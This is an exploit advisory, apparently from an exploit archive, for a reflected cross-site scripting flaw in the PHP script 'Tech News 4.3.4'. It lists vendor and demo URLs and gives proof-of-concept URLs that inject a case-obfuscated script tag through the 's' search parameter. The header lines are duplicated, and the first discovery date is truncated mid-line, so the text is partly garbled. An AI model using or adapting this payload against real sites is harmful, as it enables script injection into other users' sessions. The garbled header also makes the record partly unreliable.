# Exploit Title: Tech News 4.3.4 - Cross Site Scripting
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 19, 20 # Exploit Title: Tech News 4.3.4 - Cross Site Scripting
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 19, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/tech-news/
# Demo: http://www.phpautoclassifiedscript.com/demo/mystery/
# Tested Version: 4.3.4
# Tested on: Kali linux, Windows 8.1


# PoC:

# http://localhost/[PATH]/mystery/?s=[XSS]&search=[XSS]
# http://localhost/[PATH]/mystery/?s=%22/%3E%3CScrIpt%3Ealert(1)%3C/ScRipT%3E&search=